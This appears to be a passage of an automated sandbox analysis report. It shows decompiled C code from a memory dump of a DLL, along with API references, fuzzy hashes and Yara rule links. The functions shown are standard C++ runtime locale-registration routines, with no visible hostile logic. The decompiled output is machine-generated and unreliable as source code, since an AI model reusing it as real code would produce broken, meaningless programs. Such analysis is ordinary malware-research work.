__EH_prolog3.LIBCMT ref: 6E199823
std::_Lockit::_Lockit.LIBCPMT ref: 6E19982D

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E19987E
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19989E
Concurrency::cancel_current_task.LIBCPMT ref: 6E1998AB

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 81354c917cfb0efea763789d6747281b0c5840799b47ced74341bcf7d2dd0a4f
Instruction ID: 0ded393684258bff0ee14c6c5065d736be4c36119b1e92fdd071213cbea4ab64
Opcode Fuzzy Hash: 81354c917cfb0efea763789d6747281b0c5840799b47ced74341bcf7d2dd0a4f
Instruction Fuzzy Hash: F601C035A0051A8FCB05DBE4C864AFE77BDAF84314F280919E811AB280CF349AC4FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1998B1, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1998B1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t26;
				void* _t31;
				intOrPtr* _t50;
				void* _t54;
				intOrPtr* _t58;
				intOrPtr* _t59;
				void* _t61;

				_t44 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t61 - 0x14, 0);
				_t58 =  *0x6e221708; // 0x0
				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
				 *((intOrPtr*)(_t61 - 0x10)) = _t58;
				_t26 = E6E162171( *((intOrPtr*)(_t61 + 8)), E6E161F29(__ebx, 0x6e221698, __edi, _t58));
				_t56 = _t26;
				if(_t26 != 0) {
					L5:
					E6E18F30C(_t61 - 0x14);
					return E6E1A9D88(_t56);
				} else {
					if(_t58 == 0) {
						_push( *((intOrPtr*)(_t61 + 8)));
						_push(_t61 - 0x10);
						_t31 = E6E19B284(__ebx, _t56, _t58);
						_pop(_t50);
						__eflags = _t31 - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ecb1a, _t44, _t56, _t58, 4);
							_t59 = _t50;
							 *((intOrPtr*)(_t61 - 0x10)) = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  *((intOrPtr*)(_t61 + 0xc));
							_push( *((intOrPtr*)(_t61 + 0x14)));
							_t19 = _t61 - 4;
							 *_t19 =  *(_t61 - 4) & 0x00000000;
							__eflags =  *_t19;
							 *_t59 = 0x6e1f225c;
							 *((char*)(_t59 + 0x28)) =  *((intOrPtr*)(_t61 + 0x10));
							E6E19F3D8(_t44, _t50, _t54, _t56, _t59,  *_t19);
							return E6E1A9D88(_t59,  *((intOrPtr*)(_t61 + 8)));
						} else {
							_t56 =  *((intOrPtr*)(_t61 - 0x10));
							 *((intOrPtr*)(_t61 - 0x10)) = _t56;
							 *(_t61 - 4) = 1;
							E6E1911C1(__eflags, _t56);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t56 + 4))))();
							 *0x6e221708 = _t56;
							goto L5;
						}
					} else {
						_t56 = _t58;
						goto L5;
					}
				}
			}

0x6e1998b1
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e2
0x6e1998e7
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef

APIs

__EH_prolog3.LIBCMT ref: 6E1998B8
std::_Lockit::_Lockit.LIBCPMT ref: 6E1998C2

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E199913
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199933
Concurrency::cancel_current_task.LIBCPMT ref: 6E199940

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: d1d7b2b79f63cd14272b69b42d70213d891bf4fcdd4be9e2812dfe4b29706a27
Instruction ID: cfa45a500bc7539d7bc3f3cd895dc6ddd334d744c3be93c1c3ee13246da88bdf
Opcode Fuzzy Hash: d1d7b2b79f63cd14272b69b42d70213d891bf4fcdd4be9e2812dfe4b29706a27
Instruction Fuzzy Hash: 2301D635A00229DFCF05DBE4C864AFE77B9AF84314F244819E911AB280CF3099C4FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1996F2, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E1996F2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t62;
				void* _t100;
				signed int _t149;
				void* _t162;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				void* _t178;

				_t125 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t178 - 0x14, 0);
				_t169 =  *0x6e221734; // 0x0
				 *(_t178 - 4) =  *(_t178 - 4) & 0x00000000;
				 *(_t178 - 0x10) = _t169;
				_t62 = E6E162171( *((intOrPtr*)(_t178 + 8)), E6E161F29(__ebx, 0x6e2216e0, __edi, _t169));
				_t164 = _t62;
				if(_t62 != 0) {
					L5:
					E6E18F30C(_t178 - 0x14);
					return E6E1A9D88(_t164);
				} else {
					if(_t169 == 0) {
						_push( *((intOrPtr*)(_t178 + 8)));
						_push(_t178 - 0x10);
						__eflags = E6E19B138(__ebx, _t164, _t169) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t125, _t164, _t169, 8);
							E6E18F2A5(_t178 - 0x14, 0);
							_t170 =  *0x6e221704; // 0x0
							 *(_t178 - 4) =  *(_t178 - 4) & 0x00000000;
							 *(_t178 - 0x10) = _t170;
							_t165 = E6E162171( *((intOrPtr*)(_t178 + 8)), E6E161F29(_t125, 0x6e2216b8, _t164, _t170));
							__eflags = _t165;
							if(_t165 != 0) {
								L12:
								E6E18F30C(_t178 - 0x14);
								return E6E1A9D88(_t165);
							} else {
								__eflags = _t170;
								if(_t170 == 0) {
									_push( *((intOrPtr*)(_t178 + 8)));
									_push(_t178 - 0x10);
									__eflags = E6E19B1A4(_t125, _t165, _t170) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t125, _t165, _t170, 8);
										E6E18F2A5(_t178 - 0x14, 0);
										_t171 =  *0x6e221738; // 0x0
										 *(_t178 - 4) =  *(_t178 - 4) & 0x00000000;
										 *(_t178 - 0x10) = _t171;
										_t166 = E6E162171( *((intOrPtr*)(_t178 + 8)), E6E161F29(_t125, 0x6e2216e4, _t165, _t171));
										__eflags = _t166;
										if(_t166 != 0) {
											L19:
											E6E18F30C(_t178 - 0x14);
											return E6E1A9D88(_t166);
										} else {
											__eflags = _t171;
											if(_t171 == 0) {
												_push( *((intOrPtr*)(_t178 + 8)));
												_push(_t178 - 0x10);
												__eflags = E6E19B210(_t125, _t166, _t171) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t125, _t166, _t171, 8);
													E6E18F2A5(_t178 - 0x14, 0);
													_t172 =  *0x6e221708; // 0x0
													 *(_t178 - 4) =  *(_t178 - 4) & 0x00000000;
													 *(_t178 - 0x10) = _t172;
													_t167 = E6E162171( *((intOrPtr*)(_t178 + 8)), E6E161F29(_t125, 0x6e221698, _t166, _t172));
													__eflags = _t167;
													if(_t167 != 0) {
														L26:
														E6E18F30C(_t178 - 0x14);
														return E6E1A9D88(_t167);
													} else {
														__eflags = _t172;
														if(_t172 == 0) {
															_push( *((intOrPtr*)(_t178 + 8)));
															_push(_t178 - 0x10);
															_t100 = E6E19B284(_t125, _t167, _t172);
															_pop(_t149);
															__eflags = _t100 - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ecb1a, _t125, _t167, _t172, 4);
																_t173 = _t149;
																 *(_t178 - 0x10) = _t173;
																 *((intOrPtr*)(_t173 + 4)) =  *((intOrPtr*)(_t178 + 0xc));
																_push( *((intOrPtr*)(_t178 + 0x14)));
																_t55 = _t178 - 4;
																 *_t55 =  *(_t178 - 4) & 0x00000000;
																__eflags =  *_t55;
																 *_t173 = 0x6e1f225c;
																 *((char*)(_t173 + 0x28)) =  *((intOrPtr*)(_t178 + 0x10));
																E6E19F3D8(_t125, _t149, _t162, _t167, _t173,  *_t55);
																return E6E1A9D88(_t173,  *((intOrPtr*)(_t178 + 8)));
															} else {
																_t167 =  *(_t178 - 0x10);
																 *(_t178 - 0x10) = _t167;
																 *(_t178 - 4) = 1;
																E6E1911C1(__eflags, _t167);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t167 + 4))))();
																 *0x6e221708 = _t167;
																goto L26;
															}
														} else {
															_t167 = _t172;
															goto L26;
														}
													}
												} else {
													_t166 =  *(_t178 - 0x10);
													 *(_t178 - 0x10) = _t166;
													 *(_t178 - 4) = 1;
													E6E1911C1(__eflags, _t166);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t166 + 4))))();
													 *0x6e221738 = _t166;
													goto L19;
												}
											} else {
												_t166 = _t171;
												goto L19;
											}
										}
									} else {
										_t165 =  *(_t178 - 0x10);
										 *(_t178 - 0x10) = _t165;
										 *(_t178 - 4) = 1;
										E6E1911C1(__eflags, _t165);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t165 + 4))))();
										 *0x6e221704 = _t165;
										goto L12;
									}
								} else {
									_t165 = _t170;
									goto L12;
								}
							}
						} else {
							_t164 =  *(_t178 - 0x10);
							 *(_t178 - 0x10) = _t164;
							 *(_t178 - 4) = 1;
							E6E1911C1(__eflags, _t164);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t164 + 4))))();
							 *0x6e221734 = _t164;
							goto L5;
						}
					} else {
						_t164 = _t169;
						goto L5;
					}
				}
			}

0x6e1996f2
0x6e1996f9
0x6e199703
0x6e199708
0x6e199713
0x6e199717
0x6e199723
0x6e199728
0x6e19972c
0x6e199771
0x6e199774
0x6e199780
0x6e19972e
0x6e199730
0x6e199736
0x6e19973c
0x6e199744
0x6e199747
0x6e199781
0x6e199786
0x6e19978e
0x6e199798
0x6e19979d
0x6e1997a8
0x6e1997ac
0x6e1997bd
0x6e1997bf
0x6e1997c1
0x6e199806
0x6e199809
0x6e199815
0x6e1997c3
0x6e1997c3
0x6e1997c5
0x6e1997cb
0x6e1997d1
0x6e1997d9
0x6e1997dc
0x6e199816
0x6e19981b
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e199852
0x6e199854
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a
0x6e1997de
0x6e1997de
0x6e1997e1
0x6e1997e5
0x6e1997e9
0x6e1997f6
0x6e1997fe
0x6e199800
0x00000000
0x6e199800
0x6e1997c7
0x6e1997c7
0x00000000
0x6e1997c7
0x6e1997c5
0x6e199749
0x6e199749
0x6e19974c
0x6e199750
0x6e199754
0x6e199761
0x6e199769
0x6e19976b
0x00000000
0x6e19976b
0x6e199732
0x6e199732
0x00000000
0x6e199732
0x6e199730

APIs

__EH_prolog3.LIBCMT ref: 6E1996F9
std::_Lockit::_Lockit.LIBCPMT ref: 6E199703

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E199754
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199774
Concurrency::cancel_current_task.LIBCPMT ref: 6E199781

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 245f98f23724903587850dbeea9ba5ab30870c2b6b663192895e167cb6c117c5
Instruction ID: 5eaafbe0e6773fc60773ce2e47ac1865559b0f17b2273c51aa940c37ddae0ee0
Opcode Fuzzy Hash: 245f98f23724903587850dbeea9ba5ab30870c2b6b663192895e167cb6c117c5
Instruction Fuzzy Hash: 6A019639A005199FCF09DFE4D964AFD7779AF84314F244919E811AB280DF3099C5FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E199787, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E199787(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t50;
				void* _t77;
				signed int _t116;
				void* _t126;
				signed int _t129;
				signed int _t130;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				void* _t139;

				_t98 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t139 - 0x14, 0);
				_t132 =  *0x6e221704; // 0x0
				 *(_t139 - 4) =  *(_t139 - 4) & 0x00000000;
				 *(_t139 - 0x10) = _t132;
				_t50 = E6E162171( *((intOrPtr*)(_t139 + 8)), E6E161F29(__ebx, 0x6e2216b8, __edi, _t132));
				_t128 = _t50;
				if(_t50 != 0) {
					L5:
					E6E18F30C(_t139 - 0x14);
					return E6E1A9D88(_t128);
				} else {
					if(_t132 == 0) {
						_push( *((intOrPtr*)(_t139 + 8)));
						_push(_t139 - 0x10);
						__eflags = E6E19B1A4(__ebx, _t128, _t132) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t98, _t128, _t132, 8);
							E6E18F2A5(_t139 - 0x14, 0);
							_t133 =  *0x6e221738; // 0x0
							 *(_t139 - 4) =  *(_t139 - 4) & 0x00000000;
							 *(_t139 - 0x10) = _t133;
							_t129 = E6E162171( *((intOrPtr*)(_t139 + 8)), E6E161F29(_t98, 0x6e2216e4, _t128, _t133));
							__eflags = _t129;
							if(_t129 != 0) {
								L12:
								E6E18F30C(_t139 - 0x14);
								return E6E1A9D88(_t129);
							} else {
								__eflags = _t133;
								if(_t133 == 0) {
									_push( *((intOrPtr*)(_t139 + 8)));
									_push(_t139 - 0x10);
									__eflags = E6E19B210(_t98, _t129, _t133) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t98, _t129, _t133, 8);
										E6E18F2A5(_t139 - 0x14, 0);
										_t134 =  *0x6e221708; // 0x0
										 *(_t139 - 4) =  *(_t139 - 4) & 0x00000000;
										 *(_t139 - 0x10) = _t134;
										_t130 = E6E162171( *((intOrPtr*)(_t139 + 8)), E6E161F29(_t98, 0x6e221698, _t129, _t134));
										__eflags = _t130;
										if(_t130 != 0) {
											L19:
											E6E18F30C(_t139 - 0x14);
											return E6E1A9D88(_t130);
										} else {
											__eflags = _t134;
											if(_t134 == 0) {
												_push( *((intOrPtr*)(_t139 + 8)));
												_push(_t139 - 0x10);
												_t77 = E6E19B284(_t98, _t130, _t134);
												_pop(_t116);
												__eflags = _t77 - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ecb1a, _t98, _t130, _t134, 4);
													_t135 = _t116;
													 *(_t139 - 0x10) = _t135;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t139 + 0xc));
													_push( *((intOrPtr*)(_t139 + 0x14)));
													_t43 = _t139 - 4;
													 *_t43 =  *(_t139 - 4) & 0x00000000;
													__eflags =  *_t43;
													 *_t135 = 0x6e1f225c;
													 *((char*)(_t135 + 0x28)) =  *((intOrPtr*)(_t139 + 0x10));
													E6E19F3D8(_t98, _t116, _t126, _t130, _t135,  *_t43);
													return E6E1A9D88(_t135,  *((intOrPtr*)(_t139 + 8)));
												} else {
													_t130 =  *(_t139 - 0x10);
													 *(_t139 - 0x10) = _t130;
													 *(_t139 - 4) = 1;
													E6E1911C1(__eflags, _t130);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t130 + 4))))();
													 *0x6e221708 = _t130;
													goto L19;
												}
											} else {
												_t130 = _t134;
												goto L19;
											}
										}
									} else {
										_t129 =  *(_t139 - 0x10);
										 *(_t139 - 0x10) = _t129;
										 *(_t139 - 4) = 1;
										E6E1911C1(__eflags, _t129);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t129 + 4))))();
										 *0x6e221738 = _t129;
										goto L12;
									}
								} else {
									_t129 = _t133;
									goto L12;
								}
							}
						} else {
							_t128 =  *(_t139 - 0x10);
							 *(_t139 - 0x10) = _t128;
							 *(_t139 - 4) = 1;
							E6E1911C1(__eflags, _t128);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 4))))();
							 *0x6e221704 = _t128;
							goto L5;
						}
					} else {
						_t128 = _t132;
						goto L5;
					}
				}
			}

0x6e199787
0x6e19978e
0x6e199798
0x6e19979d
0x6e1997a8
0x6e1997ac
0x6e1997b8
0x6e1997bd
0x6e1997c1
0x6e199806
0x6e199809
0x6e199815
0x6e1997c3
0x6e1997c5
0x6e1997cb
0x6e1997d1
0x6e1997d9
0x6e1997dc
0x6e199816
0x6e19981b
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e199852
0x6e199854
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a
0x6e1997de
0x6e1997de
0x6e1997e1
0x6e1997e5
0x6e1997e9
0x6e1997f6
0x6e1997fe
0x6e199800
0x00000000
0x6e199800
0x6e1997c7
0x6e1997c7
0x00000000
0x6e1997c7
0x6e1997c5

APIs

__EH_prolog3.LIBCMT ref: 6E19978E
std::_Lockit::_Lockit.LIBCPMT ref: 6E199798

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E1997E9
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199809
Concurrency::cancel_current_task.LIBCPMT ref: 6E199816

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: dfbe5819dd14b98b8e53bb9a0a06d94f856fdea41f7690a09ee6f5dbf3398442
Instruction ID: a75e34a17e5cfc73609fdb867ac19346fc9ac67af12394ad954cd6a7c5acaf49
Opcode Fuzzy Hash: dfbe5819dd14b98b8e53bb9a0a06d94f856fdea41f7690a09ee6f5dbf3398442
Instruction Fuzzy Hash: 4A01D275A005198FCF05DBE4C924AFE77BAAF84314F244919E811AB280DF349EC4FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E19949E, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E19949E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t110;
				void* _t192;
				signed int _t281;
				void* _t306;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				void* _t334;

				_t233 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t334 - 0x14, 0);
				_t317 =  *0x6e221710; // 0x0
				 *(_t334 - 4) =  *(_t334 - 4) & 0x00000000;
				 *(_t334 - 0x10) = _t317;
				_t110 = E6E162171( *((intOrPtr*)(_t334 + 8)), E6E161F29(__ebx, 0x6e2216bc, __edi, _t317));
				_t308 = _t110;
				if(_t110 != 0) {
					L5:
					E6E18F30C(_t334 - 0x14);
					return E6E1A9D88(_t308);
				} else {
					if(_t317 == 0) {
						_push( *((intOrPtr*)(_t334 + 8)));
						_push(_t334 - 0x10);
						__eflags = E6E19AF85(__ebx, _t308, _t317) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t233, _t308, _t317, 8);
							E6E18F2A5(_t334 - 0x14, 0);
							_t318 =  *0x6e2216e8; // 0x0
							 *(_t334 - 4) =  *(_t334 - 4) & 0x00000000;
							 *(_t334 - 0x10) = _t318;
							_t309 = E6E162171( *((intOrPtr*)(_t334 + 8)), E6E161F29(_t233, 0x6e22169c, _t308, _t318));
							__eflags = _t309;
							if(_t309 != 0) {
								L12:
								E6E18F30C(_t334 - 0x14);
								return E6E1A9D88(_t309);
							} else {
								__eflags = _t318;
								if(_t318 == 0) {
									_push( *((intOrPtr*)(_t334 + 8)));
									_push(_t334 - 0x10);
									__eflags = E6E19AFED(_t233, _t309, _t318) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t233, _t309, _t318, 8);
										E6E18F2A5(_t334 - 0x14, 0);
										_t319 =  *0x6e221714; // 0x0
										 *(_t334 - 4) =  *(_t334 - 4) & 0x00000000;
										 *(_t334 - 0x10) = _t319;
										_t310 = E6E162171( *((intOrPtr*)(_t334 + 8)), E6E161F29(_t233, 0x6e2216c0, _t309, _t319));
										__eflags = _t310;
										if(_t310 != 0) {
											L19:
											E6E18F30C(_t334 - 0x14);
											return E6E1A9D88(_t310);
										} else {
											__eflags = _t319;
											if(_t319 == 0) {
												_push( *((intOrPtr*)(_t334 + 8)));
												_push(_t334 - 0x10);
												__eflags = E6E19B055(_t233, _t310, _t319) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t233, _t310, _t319, 8);
													E6E18F2A5(_t334 - 0x14, 0);
													_t320 =  *0x6e221718; // 0x0
													 *(_t334 - 4) =  *(_t334 - 4) & 0x00000000;
													 *(_t334 - 0x10) = _t320;
													_t311 = E6E162171( *((intOrPtr*)(_t334 + 8)), E6E161F29(_t233, 0x6e2216c4, _t310, _t320));
													__eflags = _t311;
													if(_t311 != 0) {
														L26:
														E6E18F30C(_t334 - 0x14);
														return E6E1A9D88(_t311);
													} else {
														__eflags = _t320;
														if(_t320 == 0) {
															_push( *((intOrPtr*)(_t334 + 8)));
															_push(_t334 - 0x10);
															__eflags = E6E19B0BD(_t233, _t311, _t320) - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ec3ec, _t233, _t311, _t320, 8);
																E6E18F2A5(_t334 - 0x14, 0);
																_t321 =  *0x6e221734; // 0x0
																 *(_t334 - 4) =  *(_t334 - 4) & 0x00000000;
																 *(_t334 - 0x10) = _t321;
																_t312 = E6E162171( *((intOrPtr*)(_t334 + 8)), E6E161F29(_t233, 0x6e2216e0, _t311, _t321));
																__eflags = _t312;
																if(_t312 != 0) {
																	L33:
																	E6E18F30C(_t334 - 0x14);
																	return E6E1A9D88(_t312);
																} else {
																	__eflags = _t321;
																	if(_t321 == 0) {
																		_push( *((intOrPtr*)(_t334 + 8)));
																		_push(_t334 - 0x10);
																		__eflags = E6E19B138(_t233, _t312, _t321) - 0xffffffff;
